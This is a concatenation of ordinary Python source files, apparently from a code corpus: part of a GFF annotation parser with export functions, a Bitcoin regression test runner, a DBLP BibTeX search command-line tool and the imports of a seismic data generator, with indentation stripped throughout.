y["strand"],
y["phase"],
";".join([f"{a}={b}" for a, b in y["attributes"].items()]),
)
)
counter[y["type"]] += 1
count += 1
logger.info("# kept {} entries".format(count))
for feature in features:
counter[feature] += 0
logger.info("# {}: {} entries".format(feature, counter[feature]))
def _process_main_fields(self, fields):
annotation = {}
# Unique id of the sequence
annotation["seqid"] = fields[0]
# Optional source
if fields[1] != ".":
annotation["source"] = fields[1]
# Annotation type
annotation["type"] = fields[2]
# Start and stop
annotation["start"] = int(fields[3])
annotation["stop"] = int(fields[4])
# Optional score field
if fields[5] != ".":
annotation["score"] = float(fields[5])
# Strand
if fields[6] == "+" or fields[6] == "-" or fields[6] == "?" or fields[6] == ".":
annotation["strand"] = fields[6]
# Phase
if fields[7] != ".":
annotation["phase"] = int(fields[7]) % 3
else:
annotation["phase"] = fields[7]
return annotation
def _process_attributes(self, text):
attributes = {}
# double the separators to keep track of them
text = text.replace("=", "===").replace(";", ";;;")
# ugly but fast replacement
text = text.replace("%09", "\t").replace("%0A", "\n").replace("%0D", "\r").replace("%25", "%")
text = text.replace("%3B", ";").replace("%3D", "=").replace("%26", "&").replace("%2C", ",")
        # split into multiple attributes
split = text.split(";;;")
for attr in split:
# make sure there are no trailing spaces
attr = attr.strip()
# find the separator. Sometimes it is a space, sometimes an = sign
idx = attr.find("===")
if idx == -1:
idx = attr.find(" ")
# parse tags and associated values
#value = self.decode_complete(attr[idx + 1 :])
value = attr[idx + 3 :]
if len(value) == 1:
value = value[0]
#attributes[self.decode_complete(attr[:idx])] = value
attributes[attr[:idx]] = value
return attributes
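# Illustrative example (hypothetical attribute string): parsing
#   "ID=gene-0001;Name=dnaA;product=replication initiator"
# with the method above yields
#   {"ID": "gene-0001", "Name": "dnaA", "product": "replication initiator"}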
def create_files_for_rnadiff(
self,
outname,
genetic_type="gene",
ID="Name",
fields=["Name"],
merge_identical_id=True,
):
"""Creates two files required for the RNADiff analysis following
sequana_rnaseq pipeline
:param str outname: the output filename prefix
:param genetic_type: genetic type to be selected from the GFF file e.g.
gene (default), CDS, etc
:param ID: the identifier (key) to be selected from the list of
attributes found in the GFF for the given type. By default, 'Name'.
Used as the first column in the two output files.
:param fields: the fields to be saved in the outname_info.tsv file
:param merge_identical_id: it may happen that the same gene **Name** has two
entries (e.g., in E. coli, two unique IDs share the same name with an
annotation such as part I and part II). If so, featureCounts is clever
enough to deal with it. Here, we need to merge the entries and sum their
lengths together. Ideally, one should not use the Name but the ID,
gene_id or locus_tag.
:return: nothing
This function reads the GFF file and creates two files:
#. outname_gene_lengths.tsv contains column 1 with identifiers and
column 2 with length of the selected type (e.g. gene)
#. outname_info.tsv: the first column is the same identifier as in the first
file and the following columns contain the fields of interest (Name by
default but could be any attribute found in the GFF, such as the
description)
"""
tokeep = []
for entry in self.read():
if genetic_type == entry["type"]:
tokeep.append(entry)
if len(tokeep) == 0:
raise ValueError("No genetic type {} was found".format(genetic_type))
import pandas as pd
df = pd.DataFrame(tokeep)
# FIXME surely this is now redundant since we have a loop above that
# performs the filtering already.
df = df.query("type==@genetic_type").copy()
# HERE we could check that ID exists
# This file is required by the RNAdiff pipeline
identifiers = df.attributes.apply(lambda x: x[ID])
length = df.stop - df.start
df["Gene_id"] = identifiers
df["Length"] = df.stop - df.start + 1
if merge_identical_id:
duplicated = df[df.Gene_id.duplicated()].Gene_id.drop_duplicates()
if len(duplicated):
logger.warning(
"Dropping {} duplicated {}(s)".format(len(duplicated), ID)
)
for name in duplicated.values:
S = df.query("Gene_id == @name").Length.sum()
items = df.query("Gene_id == @name").index
df.loc[items, "Length"] = S
df = df.drop_duplicates(subset=["Gene_id"])
df.sort_values("Gene_id")[["Gene_id", "Length"]].to_csv(
"{}_gene_lengths.tsv".format(outname), sep="\t", index=None
)
# Second file (redundant) is also required by the rnadiff pipeline
for this in fields:
data = df.attributes.apply(lambda x: x.get(this, "NA"))
df[this] = data
data = df.sort_values("Gene_id")[["Gene_id"] + fields]
data.to_csv("{}_info.tsv".format(outname), sep="\t", index=None)
return df
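# Hedged usage sketch (file names and attribute key are hypothetical): given
# an instance `gff` of this class,
#   gff.create_files_for_rnadiff("sample", genetic_type="gene", ID="ID", fields=["Name"])
# would write sample_gene_lengths.tsv (Gene_id, Length) and sample_info.tsv
# (Gene_id plus the requested fields).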
def to_gtf(self, output_filename="test.gtf", mapper={"ID": "{}_id"}):
# Experimental. Used by the rnaseq pipeline to convert an input GFF to GTF,
# as expected by the RNA-SeQC tool.
fout = open(output_filename, "w")
with open(self.filename, "r") as reader:
for line in reader:
# Skip metadata and comments
if line.startswith("#"):
fout.write(line)
continue
# Skip empty lines
if not line.strip(): # pragma: no cover
continue
split = line.rstrip().split("\t")
L = len(split)
name = split[0]
source = split[1]
feature = split[2]
start = split[3]
stop = split[4]
a = split[5]
strand = split[6]
b = split[7]
attributes = split[8]
new_attributes = ""
for item in attributes.split(";"):
try:
key, value = item.split("=")
if key in mapper.keys():
key = mapper[key].format(feature)
new_attributes += '{} "{}";'.format(key, value)
except:
pass
# Here we need some cooking due to the clumsy gtf/gff conventions
# 1. looks like attributes' values must have "" surrounding their content
# 2. if feature is e.g. exon, then gtf expects the exon_id attribute
msg = f"{name}\t{source}\t{feature}\t{start}\t{stop}\t{a}\t{strand}\t{b}\t{new_attributes}\n"
fout.write(msg)
fout.close()
def to_bed(self, output_filename, attribute_name):
"""Experimental export to BED format to be used with rseqc scripts
:param str attribute_name: the attribute_name name to be found in the
GFF attributes
"""
# rseqc expects a BED12 file. The format is not clear from the
# documentation. The first 6 columns are clear (e.g., chromosome name,
# positions, etc.) but the last ones are not. From the examples, they should
# be the block sizes and block starts of the transcript, but rseqc recommends
# the bedops gff2bed tool, which does not extract such information. For now,
# for prokaryotes, the block-sizes version has been implemented and tested
# on a Leptospira example.
fout = open(output_filename, "w")
with open(self.filename, "r") as reader:
for line in reader:
# Skip metadata and comments
if line.startswith("#"):
continue
# Skip empty lines
if not line.strip(): # pragma: no cover
continue
# a line is read and split on tabulations
split = line.rstrip().split("\t")
chrom_name = split[0]
source = split[1]
feature = split[2]
gene_start = int(split[3])
gene_stop = int(split[4])
cds_start = gene_start # for prokaryotes, for now cds=gene
cds_stop = gene_stop
a = split[5] # not used apparently
strand = split[6]
b = split[7] # not used apparently
attributes = split[8] # may be required for eukaryotes
score = 0 # in examples for rseqc, the score is always zero
unknown = 0 # a field not documented in rseqc
block_count = 1
block_sizes = f"{cds_stop-cds_start}," # fixme +1 ?
block_starts = "0," # commas are important at the end. no spaces
# according to the rseqc (bed.py) code, the expected BED format is
# chrom, chrom_start, chrom_end, gene name, score, strand, cdsStart, cdsEnd,
# blockcount, blocksizes, blockstarts, where blocksizes and blockstarts
# are comma-separated lists. Here is an example line on
# human:
# chr1 1676716 1678658 NM_001145277 0 + 1676725 1678549 0 4 182,101,105, 0,2960,7198
# for now only the feature 'gene' is implemented. We can
# generalize this later on.
if feature == "gene":
gene_name = None
for item in attributes.split(";"):
if item.split("=")[0].strip() == attribute_name:
gene_name = item.split("=")[-1]
assert gene_name
# should be the cds start/stop but for now we use the gene
# info start/stop
msg = f"{chrom_name}\t{gene_start}\t{gene_stop}\t{gene_name}\t{score}\t{strand}\t{cds_start}\t{cds_stop}\t{unknown}\t{block_count}\t{block_sizes}\t{block_starts}\n"
fout.write(msg)
fout.close()
|
test_runner.py
|
#!/usr/bin/env python3
# Copyright (c) 2014-2016 The Bitcoin Core developers
# Copyright (c) 2017 The Bitcoin developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Run regression test suite.
This module calls down into individual test cases via subprocess. It will
forward all unrecognized arguments onto the individual test scripts.
Functional tests are disabled on Windows by default. Use --force to run them anyway.
For a description of arguments recognized by test scripts, see
`test/functional/test_framework/test_framework.py:BitcoinTestFramework.main`.
"""
import argparse
import configparser
import datetime
import os
import time
import shutil
import sys
import subprocess
import tempfile
import re
import logging
import xml.etree.ElementTree as ET
import json
import threading
import multiprocessing
from queue import Queue, Empty
# Formatting. Default colors to empty strings.
BOLD, BLUE, RED, GREY = ("", ""), ("", ""), ("", ""), ("", "")
try:
# Make sure python thinks it can write unicode to its stdout
"\u2713".encode("utf_8").decode(sys.stdout.encoding)
TICK = "✓ "
CROSS = "✖ "
CIRCLE = "○ "
except UnicodeDecodeError:
TICK = "P "
CROSS = "x "
CIRCLE = "o "
if os.name == 'posix':
# primitive formatting on supported
# terminal via ANSI escape sequences:
BOLD = ('\033[0m', '\033[1m')
BLUE = ('\033[0m', '\033[0;34m')
RED = ('\033[0m', '\033[0;31m')
GREY = ('\033[0m', '\033[1;30m')
TEST_EXIT_PASSED = 0
TEST_EXIT_SKIPPED = 77
NON_SCRIPTS = [
# These are python files that live in the functional tests directory, but are not test scripts.
"combine_logs.py",
"create_cache.py",
"test_runner.py",
]
TEST_PARAMS = {
# Some tests can be run with additional parameters.
# When a test is listed here, it will be run without parameters
# as well as with the additional parameters listed here.
# For example:
# "testName" : [["--param1", "--param2"] , ["--param3"]]
# will run the test 3 times:
# testName
# testName --param1 --param2
# testName --param3
"wallet_txn_doublespend.py": [["--mineblock"]],
"wallet_txn_clone.py": [["--mineblock"]],
"wallet_multiwallet.py": [["--usecli"]],
}
# Used to limit the number of tests, when list of tests is not provided on command line
# When --extended is specified, we run all tests, otherwise
# we only run a test if its execution time in seconds does not exceed EXTENDED_CUTOFF
DEFAULT_EXTENDED_CUTOFF = 40
DEFAULT_JOBS = (multiprocessing.cpu_count() // 3) + 1
class TestCase():
"""
Data structure to hold and run information necessary to launch a test case.
"""
def __init__(self, test_num, test_case, tests_dir, tmpdir, flags=None):
self.tests_dir = tests_dir
self.tmpdir = tmpdir
self.test_case = test_case
self.test_num = test_num
self.flags = flags
def run(self, portseed_offset):
t = self.test_case
portseed = self.test_num + portseed_offset
portseed_arg = ["--portseed={}".format(portseed)]
log_stdout = tempfile.SpooledTemporaryFile(max_size=2**16)
log_stderr = tempfile.SpooledTemporaryFile(max_size=2**16)
test_argv = t.split()
tmpdir = [os.path.join("--tmpdir={}", "{}_{}").format(
self.tmpdir, re.sub(".py$", "", test_argv[0]), portseed)]
name = t
time0 = time.time()
process = subprocess.Popen([os.path.join(self.tests_dir, test_argv[0])] + test_argv[1:] + self.flags + portseed_arg + tmpdir,
universal_newlines=True,
stdout=log_stdout,
stderr=log_stderr)
process.wait()
log_stdout.seek(0), log_stderr.seek(0)
[stdout, stderr] = [l.read().decode('utf-8')
for l in (log_stdout, log_stderr)]
log_stdout.close(), log_stderr.close()
if process.returncode == TEST_EXIT_PASSED and stderr == "":
status = "Passed"
elif process.returncode == TEST_EXIT_SKIPPED:
status = "Skipped"
else:
status = "Failed"
return TestResult(name, status, int(time.time() - time0), stdout, stderr)
def on_ci():
return os.getenv('TRAVIS') == 'true' or os.getenv('TEAMCITY_VERSION') != None
def main():
# Read config generated by configure.
config = configparser.ConfigParser()
configfile = os.path.join(os.path.abspath(
os.path.dirname(__file__)), "..", "config.ini")
config.read_file(open(configfile))
src_dir = config["environment"]["SRCDIR"]
build_dir = config["environment"]["BUILDDIR"]
tests_dir = os.path.join(src_dir, 'test', 'functional')
# Parse arguments and pass through unrecognised args
parser = argparse.ArgumentParser(add_help=False,
usage='%(prog)s [test_runner.py options] [script options] [scripts]',
description=__doc__,
epilog='''
Help text and arguments for individual test script:''',
formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument('--coverage', action='store_true',
help='generate a basic coverage report for the RPC interface')
parser.add_argument(
'--exclude', '-x', help='specify a comma-separated list of scripts to exclude. Do not include the .py extension in the name.')
parser.add_argument('--extended', action='store_true',
help='run the extended test suite in addition to the basic tests')
parser.add_argument('--cutoff', type=int, default=DEFAULT_EXTENDED_CUTOFF,
help='set the cutoff runtime for what tests get run')
parser.add_argument('--force', '-f', action='store_true',
help='run tests even on platforms where they are disabled by default (e.g. windows).')
parser.add_argument('--help', '-h', '-?',
action='store_true', help='print help text and exit')
parser.add_argument('--jobs', '-j', type=int, default=DEFAULT_JOBS,
help='how many test scripts to run in parallel (default: based on the number of CPUs).')
parser.add_argument('--keepcache', '-k', action='store_true',
help='the default behavior is to flush the cache directory on startup. --keepcache retains the cache from the previous test run.')
parser.add_argument('--quiet', '-q', action='store_true',
help='only print results summary and failure logs')
parser.add_argument('--tmpdirprefix', '-t',
default=tempfile.gettempdir(), help="Root directory for datadirs")
parser.add_argument('--junitouput', '-ju',
default=os.path.join(build_dir, 'junit_results.xml'), help="file that will store JUnit formatted test results.")
args, unknown_args = parser.parse_known_args()
# Create a set to store arguments and create the passon string
tests = set(arg for arg in unknown_args if arg[:2] != "--")
passon_args = [arg for arg in unknown_args if arg[:2] == "--"]
passon_args.append("--configfile={}".format(configfile))
# Set up logging
logging_level = logging.INFO if args.quiet else logging.DEBUG
logging.basicConfig(format='%(message)s', level=logging_level)
# Create base test directory
tmpdir = os.path.join("{}", "bitcoin_test_runner_{:%Y%m%d_%H%M%S}").format(
args.tmpdirprefix, datetime.datetime.now())
os.makedirs(tmpdir)
logging.debug("Temporary test directory at {}".format(tmpdir))
enable_wallet = config["components"].getboolean("ENABLE_WALLET")
enable_utils = config["components"].getboolean("ENABLE_UTILS")
enable_bitcoind = config["components"].getboolean("ENABLE_BITCOIND")
if config["environment"]["EXEEXT"] == ".exe" and not args.force:
# https://github.com/bitcoin/bitcoin/commit/d52802551752140cf41f0d9a225a43e84404d3e9
# https://github.com/bitcoin/bitcoin/pull/5677#issuecomment-136646964
print(
"Tests currently disabled on Windows by default. Use --force option to enable")
sys.exit(0)
if not (enable_wallet and enable_utils and enable_bitcoind):
print(
"No functional tests to run. Wallet, utils, and bitcoind must all be enabled")
print(
"Rerun `configure` with -enable-wallet, -with-utils and -with-daemon and rerun make")
sys.exit(0)
# Build list of tests
all_scripts = get_all_scripts_from_disk(tests_dir, NON_SCRIPTS)
# Check all tests with parameters actually exist
for test in TEST_PARAMS:
if not test in all_scripts:
print("ERROR: Test with parameter {} does not exist, check it has "
"not been renamed or deleted".format(test))
sys.exit(1)
if tests:
# Individual tests have been specified. Run specified tests that exist
# in the all_scripts list. Accept the name with or without .py
# extension.
test_list = [t for t in all_scripts if
(t in tests or re.sub(".py$", "", t) in tests)]
# Allow for wildcard at the end of the name, so a single input can
# match multiple tests
for test in tests:
if test.endswith('*'):
test_list.extend(
[t for t in all_scripts if t.startswith(test[:-1])])
# Make the list unique
test_list = list(set(test_list))
# do not cut off explicitly specified tests
cutoff = sys.maxsize
else:
# No individual tests have been specified.
# Run all tests that do not exceed
test_list = all_scripts
cutoff = args.cutoff
if args.extended:
cutoff = sys.maxsize
# Remove the test cases that the user has explicitly asked to exclude.
if args.exclude:
for exclude_test in args.exclude.split(','):
if exclude_test + ".py" in test_list:
test_list.remove(exclude_test + ".py")
# Use and update timings from build_dir only if separate
# build directory is used. We do not want to pollute source directory.
build_timings = None
if (src_dir != build_dir):
build_timings = Timings(os.path.join(build_dir, 'timing.json'))
# Always use timings from src_dir if present
src_timings = Timings(os.path.join(
src_dir, "test", "functional", 'timing.json'))
# Add test parameters and remove long running tests if needed
test_list = get_tests_to_run(
test_list, TEST_PARAMS, cutoff, src_timings, build_timings)
if not test_list:
print("No valid test scripts specified. Check that your test is in one "
"of the test lists in test_runner.py, or run test_runner.py with no arguments to run all tests")
sys.exit(0)
if args.help:
# Print help for test_runner.py, then print help of the first script
# and exit.
parser.print_help()
subprocess.check_call(
[os.path.join(tests_dir, test_list[0]), '-h'])
sys.exit(0)
if not args.keepcache:
shutil.rmtree(os.path.join(build_dir, "test",
"cache"), ignore_errors=True)
run_tests(test_list, build_dir, tests_dir, args.junitouput,
config["environment"]["EXEEXT"], tmpdir, args.jobs, args.coverage, passon_args, build_timings)
def run_tests(test_list, build_dir, tests_dir, junitouput, exeext, tmpdir, num_jobs, enable_coverage=False, args=[], build_timings=None):
# Warn if bitcoind is already running (unix only)
try:
pidofOutput = subprocess.check_output(["pidof", "bitcoind"])
if pidofOutput is not None and pidofOutput != b'':
print("{}WARNING!{} There is already a bitcoind process running on this system. Tests may fail unexpectedly due to resource contention!".format(
BOLD[1], BOLD[0]))
except (OSError, subprocess.SubprocessError):
pass
# Warn if there is a cache directory
cache_dir = os.path.join(build_dir, "test", "cache")
if os.path.isdir(cache_dir):
print("{}WARNING!{} There is a cache directory here: {}. If tests fail unexpectedly, try deleting the cache directory.".format(
BOLD[1], BOLD[0], cache_dir))
# Set env vars
if "BITCOIND" not in os.environ:
os.environ["BITCOIND"] = os.path.join(
build_dir, 'src', 'bitcoind' + exeext)
os.environ["BITCOINCLI"] = os.path.join(
build_dir, 'src', 'bitcoin-cli' + exeext)
flags = [os.path.join("--srcdir={}".format(build_dir), "src")] + args
flags.append("--cachedir={}".format(cache_dir))
if enable_coverage:
coverage = RPCCoverage()
flags.append(coverage.flag)
logging.debug(
"Initializing coverage directory at {}".format(coverage.dir))
else:
coverage = None
if len(test_list) > 1 and num_jobs > 1:
# Populate cache
try:
subprocess.check_output(
[os.path.join(tests_dir, 'create_cache.py')] + flags + [os.path.join("--tmpdir={}", "cache") .format(tmpdir)])
except Exception as e:
print(e.output)
raise e
# Run Tests
time0 = time.time()
test_results = execute_test_processes(
num_jobs, test_list, tests_dir, tmpdir, flags)
runtime = int(time.time() - time0)
max_len_name = len(max(test_list, key=len))
print_results(test_results, max_len_name, runtime)
save_results_as_junit(test_results, junitouput, runtime)
if (build_timings is not None):
build_timings.save_timings(test_results)
if coverage:
coverage.report_rpc_coverage()
logging.debug("Cleaning up coverage data")
coverage.cleanup()
# Clear up the temp directory if all subdirectories are gone
if not os.listdir(tmpdir):
os.rmdir(tmpdir)
all_passed = all(
map(lambda test_result: test_result.was_successful, test_results))
sys.exit(not all_passed)
def execute_test_processes(num_jobs, test_list, tests_dir, tmpdir, flags):
update_queue = Queue()
job_queue = Queue()
test_results = []
poll_timeout = 10 # seconds
# In case there is a graveyard of zombie bitcoinds, we can apply a
# pseudorandom offset to hopefully jump over them.
# (625 is PORT_RANGE/MAX_NODES)
portseed_offset = int(time.time() * 1000) % 625
##
# Define some helper functions we will need for threading.
##
def handle_message(message, running_jobs):
"""
handle_message handles a single message from handle_test_cases
"""
if isinstance(message, TestCase):
running_jobs.add(message.test_case)
print("{}{}{} started".format(BOLD[1], message.test_case, BOLD[0]))
return
if isinstance(message, TestResult):
test_result = message
running_jobs.remove(test_result.name)
test_results.append(test_result)
if test_result.status == "Passed":
print("{}{}{} passed, Duration: {} s".format(
BOLD[1], test_result.name, BOLD[0], test_result.time))
elif test_result.status == "Skipped":
print("{}{}{} skipped".format(
BOLD[1], test_result.name, BOLD[0]))
else:
print("{}{}{} failed, Duration: {} s\n".format(
BOLD[1], test_result.name, BOLD[0], test_result.time))
print(BOLD[1] + 'stdout:' + BOLD[0])
print(test_result.stdout)
print(BOLD[1] + 'stderr:' + BOLD[0])
print(test_result.stderr)
return
assert False, "we should not be here"
def handle_update_messages():
"""
handle_update_messages waits for messages to be sent from handle_test_cases via the
update_queue. It serializes the results so we can print nice status update messages.
"""
printed_status = False
running_jobs = set()
while True:
message = None
try:
message = update_queue.get(True, poll_timeout)
if message is None:
break
# We printed a status message, need to kick to the next line
# before printing more.
if printed_status:
print()
printed_status = False
handle_message(message, running_jobs)
update_queue.task_done()
except Empty as e:
if not on_ci():
print("Running jobs: {}".format(", ".join(running_jobs)), end="\r")
sys.stdout.flush()
printed_status = True
def handle_test_cases():
"""
handle_test_cases represents a single thread that is part of a worker pool.
It waits for a test, then executes that test.
It also reports start and result messages to handle_update_messages
"""
while True:
test = job_queue.get()
if test is None:
break
# Signal that the test is starting to inform the poor waiting
# programmer
update_queue.put(test)
result = test.run(portseed_offset)
update_queue.put(result)
job_queue.task_done()
##
# Setup our threads, and start sending tasks
##
# Start our result collection thread.
t = threading.Thread(target=handle_update_messages)
t.setDaemon(True)
t.start()
# Start some worker threads
for j in range(num_jobs):
t = threading.Thread(target=handle_test_cases)
t.setDaemon(True)
t.start()
# Push all our test cases into the job queue.
for i, t in enumerate(test_list):
job_queue.put(TestCase(i, t, tests_dir, tmpdir, flags))
# Wait for all the jobs to be completed
job_queue.join()
# Wait for all the results to be compiled
update_queue.join()
# Flush our queues so the threads exit
update_queue.put(None)
for j in range(num_jobs):
job_queue.put(None)
return test_results
def print_results(test_results, max_len_name, runtime):
results = "\n" + BOLD[1] + "{} | {} | {}\n\n".format(
"TEST".ljust(max_len_name), "STATUS ", "DURATION") + BOLD[0]
test_results.sort(key=lambda result: result.name.lower())
all_passed = True
time_sum = 0
for test_result in test_results:
all_passed = all_passed and test_result.was_successful
time_sum += test_result.time
test_result.padding = max_len_name
results += str(test_result)
status = TICK + "Passed" if all_passed else CROSS + "Failed"
results += BOLD[1] + "\n{} | {} | {} s (accumulated) \n".format(
"ALL".ljust(max_len_name), status.ljust(9), time_sum) + BOLD[0]
results += "Runtime: {} s\n".format(runtime)
print(results)
class TestResult():
"""
Simple data structure to store test result values and print them properly
"""
def __init__(self, name, status, time, stdout, stderr):
self.name = name
self.status = status
self.time = time
self.padding = 0
self.stdout = stdout
self.stderr = stderr
def __repr__(self):
if self.status == "Passed":
color = BLUE
glyph = TICK
elif self.status == "Failed":
color = RED
glyph = CROSS
elif self.status == "Skipped":
color = GREY
glyph = CIRCLE
return color[1] + "{} | {}{} | {} s\n".format(
self.name.ljust(self.padding), glyph, self.status.ljust(7), self.time) + color[0]
@property
def was_successful(self):
return self.status != "Failed"
def get_all_scripts_from_disk(test_dir, non_scripts):
"""
Return all available test scripts from the script directory (excluding NON_SCRIPTS)
"""
python_files = set([t for t in os.listdir(test_dir) if t[-3:] == ".py"])
return list(python_files - set(non_scripts))
def get_tests_to_run(test_list, test_params, cutoff, src_timings, build_timings=None):
"""
Returns only tests that will not run longer than the cutoff.
Long-running tests are returned first to favor running tests in parallel.
Timings from the build directory override those from the src directory.
"""
def get_test_time(test):
if build_timings is not None:
timing = next(
(x['time'] for x in build_timings.existing_timings if x['name'] == test), None)
if timing is not None:
return timing
# try source directory. Return 0 if test is unknown to always run it
return next(
(x['time'] for x in src_timings.existing_timings if x['name'] == test), 0)
# Some tests must also be run with additional parameters. Add them to the list.
tests_with_params = []
for test_name in test_list:
# always execute a test without parameters
tests_with_params.append(test_name)
params = test_params.get(test_name)
if params is not None:
tests_with_params.extend(
[test_name + " " + " ".join(p) for p in params])
result = [t for t in tests_with_params if get_test_time(t) <= cutoff]
result.sort(key=lambda x: (-get_test_time(x), x))
return result
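# Illustrative sketch (hypothetical timings): with cutoff=40 and recorded
# times {"a.py": 60, "b.py": 10, "c.py": 35}, get_tests_to_run drops a.py
# (60 > 40) and returns ["c.py", "b.py"], longest-running first so that the
# parallel workers are kept busy.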
class RPCCoverage():
"""
Coverage reporting utilities for test_runner.
Coverage calculation works by having each test script subprocess write
coverage files into a particular directory. These files contain the RPC
commands invoked during testing, as well as a complete listing of RPC
commands per `bitcoin-cli help` (`rpc_interface.txt`).
After all tests complete, the commands run are combined and diff'd against
the complete list to calculate uncovered RPC commands.
See also: test/functional/test_framework/coverage.py
"""
def __init__(self):
self.dir = tempfile.mkdtemp(prefix="coverage")
self.flag = '--coveragedir={}'.format(self.dir)
def report_rpc_coverage(self):
"""
Print out RPC commands that were unexercised by tests.
"""
uncovered = self._get_uncovered_rpc_commands()
if uncovered:
print("Uncovered RPC commands:")
print("".join((" - {}\n".format(i)) for i in sorted(uncovered)))
else:
print("All RPC commands covered.")
def cleanup(self):
return shutil.rmtree(self.dir)
def _get_uncovered_rpc_commands(self):
"""
Return a set of currently untested RPC commands.
"""
# This is shared from `test/functional/test_framework/coverage.py`
reference_filename = 'rpc_interface.txt'
coverage_file_prefix = 'coverage.'
coverage_ref_filename = os.path.join(self.dir, reference_filename)
coverage_filenames = set()
all_cmds = set()
covered_cmds = set()
if not os.path.isfile(coverage_ref_filename):
raise RuntimeError("No coverage reference found")
with open(coverage_ref_filename, 'r') as f:
all_cmds.update([i.strip() for i in f.readlines()])
for root, dirs, files in os.walk(self.dir):
for filename in files:
if filename.startswith(coverage_file_prefix):
coverage_filenames.add(os.path.join(root, filename))
for filename in coverage_filenames:
with open(filename, 'r') as f:
covered_cmds.update([i.strip() for i in f.readlines()])
return all_cmds - covered_cmds
def save_results_as_junit(test_results, file_name, time):
"""
Save tests results to file in JUnit format
See http://llg.cubic.org/docs/junit/ for specification of format
"""
e_test_suite = ET.Element("testsuite",
{"name": "bitcoin_abc_tests",
"tests": str(len(test_results)),
# "errors":
"failures": str(len([t for t in test_results if t.status == "Failed"])),
"id": "0",
"skipped": str(len([t for t in test_results if t.status == "Skipped"])),
"time": str(time),
"timestamp": datetime.datetime.now().isoformat('T')
})
for test_result in test_results:
e_test_case = ET.SubElement(e_test_suite, "testcase",
{"name": test_result.name,
"classname": test_result.name,
"time": str(test_result.time)
}
)
if test_result.status == "Skipped":
ET.SubElement(e_test_case, "skipped")
elif test_result.status == "Failed":
ET.SubElement(e_test_case, "failure")
# no special element for passed tests
ET.SubElement(e_test_case, "system-out").text = test_result.stdout
ET.SubElement(e_test_case, "system-err").text = test_result.stderr
ET.ElementTree(e_test_suite).write(
file_name, "UTF-8", xml_declaration=True)
class Timings():
"""
Takes care of loading, merging and saving test execution times.
"""
def __init__(self, timing_file):
self.timing_file = timing_file
self.existing_timings = self.load_timings()
def load_timings(self):
if os.path.isfile(self.timing_file):
with open(self.timing_file) as f:
return json.load(f)
else:
return []
def get_merged_timings(self, new_timings):
"""
Return new list containing existing timings updated with new timings
Tests that do not exist are not removed
"""
key = 'name'
merged = {}
for item in self.existing_timings + new_timings:
if item[key] in merged:
merged[item[key]].update(item)
else:
merged[item[key]] = item
# Sort the result to preserve test ordering in file
merged = list(merged.values())
merged.sort(key=lambda t, key=key: t[key])
return merged
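# Illustrative sketch (hypothetical entries): merging
#   existing = [{"name": "a.py", "time": 10}]
#   new      = [{"name": "a.py", "time": 12}, {"name": "b.py", "time": 5}]
# yields [{"name": "a.py", "time": 12}, {"name": "b.py", "time": 5}], i.e.
# new timings win and tests without new timings are kept.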
def save_timings(self, test_results):
# we only save tests that have passed - timings for failed tests might be
# wrong (timeouts or early fails)
passed_results = [t for t in test_results if t.status == 'Passed']
new_timings = list(map(lambda t: {'name': t.name, 'time': t.time},
passed_results))
merged_timings = self.get_merged_timings(new_timings)
with open(self.timing_file, 'w') as f:
json.dump(merged_timings, f, indent=True)
if __name__ == '__main__':
main()
|
cli.py
|
import argparse
import requests
import json
import sys
from simple_term_menu import TerminalMenu
from pygments import highlight
from pygments.lexers.bibtex import BibTeXLexer
from pygments.formatters import TerminalFormatter
from multiprocess import Process, Manager
import shutil
def fullname(str1):
# split the string into a list
lst = str1.split()
newspace = ""
for l in lst[:-1]:
newspace += (l[0].upper() + '. ')
newspace += lst[-1].title()
return newspace
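# Illustrative example (hypothetical name): fullname("donald ervin knuth")
# returns "D. E. Knuth" -- initials for every word but the last, which is
# title-cased.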
def args_parser():
parser = argparse.ArgumentParser()
parser.add_argument(
'query', metavar="QUERY", nargs='+', help='Search query')
parser.add_argument('--all', action='store_true', help='print all hits')
return parser.parse_args()
def query(query_lst):
manager = Manager()
hits = manager.dict()
results = []
for q in query_lst:
r = requests.get('http://dblp.uni-trier.de/search/publ/api',
params={'q': q, 'h': 100, 'format': 'json'})
if r.status_code == 429:
raise RuntimeError("DBLP API rate limit reached (HTTP 429)")
json_answer = r.json()
res = json_answer["result"]["hits"].get("hit", None)
if res is None:
continue
results += res
def f(d, hit, n):
if hit is None:
return
authors = hit["info"].pop("authors")
if isinstance(authors["author"], dict):
hit["info"]["authors"] = authors["author"]["text"]
else:
hit["info"]["authors"] = [
fullname(a["text"]) for a in authors["author"]]
hit["info"]["bibtex"] = get_bib(hit["info"]["key"])
d[n] = hit["info"]
job = [Process(target=f, args=(hits, hit, n))
for n, hit in enumerate(results)]
_ = [p.start() for p in job]
_ = [p.join() for p in job]
return dict(hits)
def shorten_authors(authlist):
if len(authlist) > 3:
return ", ".join(authlist[0:3]) + ", et al."
return ", ".join(authlist)
def menu(hits):
width = shutil.get_terminal_size((80, 20))[0]
max_author_width = max([len(shorten_authors(v["authors"])) for k, v in hits.items()])
offset = 2
third_col = 30
first_col = max_author_width + 1
second_col = width - third_col - first_col - offset
items = []
for k, v in hits.items():
authors = shorten_authors(v["authors"])
items.append("{author:<{first_col}}{title:<{second_col}}{venue:>{third_col}}|{k}".format(
author=authors.strip(), title=v["title"].strip(),
venue=v["venue"].strip(), k=k, first_col=first_col,
second_col=second_col,third_col=third_col))
def return_bib(k):
code = hits[int(k)].get("bibtex", "")
formatter = TerminalFormatter(bg="dark")
return highlight(code, BibTeXLexer(), formatter)
terminal_menu = TerminalMenu(
items, preview_command=return_bib, preview_size=0.75)
menu_entry_index = terminal_menu.show()
return menu_entry_index
def get_bib(key):
r = requests.get(f"http://dblp.uni-trier.de/rec/bib2/{key}.bib")
return r.text.strip()
def main():
args = args_parser()
input_raw = query(args.query)
hits = {}
for key,value in input_raw.items():
if value not in hits.values():
hits[key] = value
if not hits:
sys.exit()
if args.all:
for k,v in hits.items():
print(v["bibtex"])
else:
item = menu(hits)
if item is not None:
print(hits[item]["bibtex"])
if __name__ == "__main__":
main()
|
generate_data.py
|
#%%
# Fetch data from reproducibility.org
#sf.Fetch('marm','marmvel.hh')
# #%% [markdown]
# ## Generating the model
# First we create a model by augmenting Marmousi II
#%% [markdown]
# ## Generator features
#
# ### Several layers can be generated from a single one
#
# ### Velocities are exactly the same as in the mother model (Marmousi)
#
#%%
#(c) Vladimir Kazei, Oleg Ovcharenko; KAUST 2020
# cell with imports
import importlib
import multiprocessing
import os
import os.path
import sys
import time
import pickle
import threading
import random
from numba import jit
# madagascar API
